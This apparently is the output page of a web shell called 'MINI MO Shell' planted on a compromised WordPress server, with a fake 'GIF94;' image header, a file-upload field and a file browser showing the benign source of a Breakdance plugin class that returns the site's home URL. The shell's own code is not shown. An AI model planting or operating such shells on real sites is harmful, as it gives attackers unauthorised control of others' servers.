GIF94; MINI MO Shell - Tarih Gösterimli

MINI MINI MANI MO - TARİH GÖSTERİMLİ

Path : /var/www/wordpress/wp-content/plugins/oxygen/plugin/dynamic-data/fields/site/
File Upload :
Current File : /var/www/wordpress/wp-content/plugins/oxygen/plugin/dynamic-data/fields/site/home-url.php

<?php

namespace Breakdance\DynamicData;

class HomeUrl extends StringField
{

    /**
     * @inheritDoc
     */
    public function label()
    {
        return __('Home URL', 'breakdance');
    }

    /**
     * @inheritDoc
     */
    public function category()
    {
        return __('Site Info', 'breakdance');
    }

    /**
     * @inheritDoc
     */
    public function slug()
    {
        return 'home_url';
    }

    /**
     * @inheritDoc
     */
    public function returnTypes()
    {
        return ['url', 'string'];
    }

    /**
     * @inheritDoc
     */
    public function handler($attributes): StringData
    {
        return StringData::fromString(get_bloginfo('url'));
    }
}


OHA YOOO - Tarih: 2026-08-04 00:36:20